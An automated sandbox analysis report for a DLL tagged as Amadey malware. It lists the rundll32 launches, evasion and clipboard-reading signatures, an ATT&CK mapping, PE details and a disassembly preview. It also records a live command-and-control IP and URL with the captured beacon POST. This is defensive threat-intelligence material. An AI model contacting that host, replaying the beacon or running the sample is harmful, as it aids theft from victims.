Edit tour

Windows Analysis Report
uLV6jN2BWh.dll

Overview

General Information

Sample name:	uLV6jN2BWh.dll renamed because original name is a hash value
Original sample name:	9fcac34b8162651f29288e1ffff9394d.dll
Analysis ID:	1542876
MD5:	9fcac34b8162651f29288e1ffff9394d
SHA1:	68f2eb355162fbe260c6f7256d2a13fa5e6227d0
SHA256:	61e770436568881a68dc2c4db3e84f33a89f5d7068f5988582c133cbe7c9519c
Tags:	32Amadeydllexetrojan
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

System process connects to network (likely due to code injection or exploit)

Found potential dummy code loops (likely to delay analysis)

Sample uses string decryption to hide its real strings

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 3380 cmdline: loaddll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)

conhost.exe (PID: 1120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4744 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

rundll32.exe (PID: 5068 cmdline: rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 4668 cmdline: rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 6584 cmdline: rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 6616 cmdline: rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,Main MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 6416 cmdline: rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 6408 cmdline: rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 5688 cmdline: rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",Main MD5: 889B99C52A60DD49227C5E485A016679)

cleanup

Code function: 7_2_6FB91EC0 std::_Xinvalid_argument,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

7_2_6FB91EC0

Source: unknown

HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.217Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1

Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.4530891630.0000000000DE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.4530891630.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php)
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php/J
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php4
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php5Y
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpV
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpdY
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpl
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/NF1d

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB931B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,

7_2_6FB931B0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB931B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,

7_2_6FB931B0

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FB931B0		7_2_6FB931B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FBA1AB1		7_2_6FBA1AB1

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6FB96B05 appears 47 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6FB973B0 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6FB95D90 appears 103 times

Source: uLV6jN2BWh.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: classification engine

Classification label: mal56.evad.winDLL@18/0@0/1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1120:120:WilError_03

Source: uLV6jN2BWh.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,Main
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",Main
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,Main	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",Main	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: uLV6jN2BWh.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: uLV6jN2BWh.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: uLV6jN2BWh.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: uLV6jN2BWh.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: uLV6jN2BWh.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: uLV6jN2BWh.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: uLV6jN2BWh.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: uLV6jN2BWh.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: uLV6jN2BWh.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: uLV6jN2BWh.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: uLV6jN2BWh.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: uLV6jN2BWh.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: uLV6jN2BWh.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 2307	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 7688	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 1015	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 8983	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148	Thread sleep count: 2307 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148	Thread sleep time: -2307000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148	Thread sleep count: 7688 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148	Thread sleep time: -7688000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152	Thread sleep count: 1015 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152	Thread sleep time: -1015000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152	Thread sleep count: 8983 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152	Thread sleep time: -8983000s >= -30000s	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB9BCEE FindFirstFileExW,

7_2_6FB9BCEE

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: rundll32.exe, 0000000A.00000002.4530873570.0000000000778000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8q8q
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.0000000000778000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX@

Anti Debugging

Found potential dummy code loops (likely to delay analysis)

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 42% for more than 60s

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB97288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_6FB97288

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FB9A254 mov eax, dword ptr fs:[00000030h]		7_2_6FB9A254
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FB9B881 mov eax, dword ptr fs:[00000030h]		7_2_6FB9B881

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB9D218 GetProcessHeap,

7_2_6FB9D218

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FB96B1A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_6FB96B1A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FB97288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_6FB97288
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FB99820 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_6FB99820

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 185.215.113.217 80

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB970A7 cpuid

7_2_6FB970A7

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB973F8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_6FB973F8

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	112 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	111 Process Injection	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	2 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	112 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	1 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Rundll32	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.217/CoreOPT/index.php	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://185.215.113.217/CoreOPT/index.php/J	rundll32.exe, 00000007.00000002.4530891630.0000000000DB0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.217/CoreOPT/index.phpV	rundll32.exe, 00000007.00000002.4530891630.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.217/CoreOPT/index.phpl	rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.217/	rundll32.exe, 00000007.00000002.4530891630.0000000000DE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.217/CoreOPT/index.php)	rundll32.exe, 00000007.00000002.4530891630.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.217/CoreOPT/index.php5Y	rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.217/CoreOPT/index.phpdY	rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.217/CoreOPT/index.php4	rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.217/NF1d	rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.217	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1542876
Start date and time:	2024-10-26 19:12:51 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	uLV6jN2BWh.dll renamed because original name is a hash value
Original Sample Name:	9fcac34b8162651f29288e1ffff9394d.dll
Detection:	MAL
Classification:	mal56.evad.winDLL@18/0@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 8 Number of non-executed functions: 28
Cookbook Comments:	Found application associated with file extension: .dll Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: uLV6jN2BWh.dll

Simulations

Behavior and APIs

Time	Type	Description
13:13:52	API Interceptor	1x Sleep call for process: loaddll32.exe modified
13:14:23	API Interceptor	12186368x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.217	mU3Ob2XcCt.dll	Get hash	malicious	Amadey	Browse	185.215.113.217/CoreOPT/index.php?wal=1

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	mU3Ob2XcCt.dll	Get hash	malicious	Amadey	Browse	185.215.113.217
	ZnPyVAOUBc.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.217
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.206

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.356468550413769
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	uLV6jN2BWh.dll
File size:	126'976 bytes
MD5:	9fcac34b8162651f29288e1ffff9394d
SHA1:	68f2eb355162fbe260c6f7256d2a13fa5e6227d0
SHA256:	61e770436568881a68dc2c4db3e84f33a89f5d7068f5988582c133cbe7c9519c
SHA512:	c571704b0c2c8f209538487bc63625ac62789efc27043c15cc9db3d30c6f783f5702e5b2a801dc42ce1406f394815df85f8e31357879d0a0365a5a6da41f9263
SSDEEP:	3072:odUmIYSBYZuziT7Sgmu1ErYn/YoZ3SNq0l9ZidU1epo:TBY7yASgb1ErY3Z309odUwpo
TLSH:	29C34B213496C031C65D567E18A8ABF487BD6914DFB04DE77B840E7B8E242C2EE34D7A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P............................................................................@.......@.......@.~.....@.......Rich...........

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x10007062
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x671CF638 [Sat Oct 26 14:01:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	fdb088ba51afbf555d7a0f495212d8f1

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F33A0BC4917h
call 00007F33A0BC4CEAh
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F33A0BC47C3h
add esp, 0Ch
pop ebp
retn 000Ch
jmp 00007F33A0BC8632h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F33A0BC3EC5h
push 1001C6A0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F33A0BC537Dh
int3
push ebp
mov ebp, esp
and dword ptr [1001F708h], 00000000h
sub esp, 24h
or dword ptr [1001E00Ch], 01h
push 0000000Ah
call dword ptr [10016050h]
test eax, eax
je 00007F33A0BC4ABFh
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-1Ch]
mov dword ptr [ebp-0Ch], eax
xor edi, 6C65746Eh
mov eax, dword ptr [ebp-18h]
xor eax, 49656E69h
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp-20h]
xor eax, 756E6547h
mov dword ptr [ebp-04h], eax
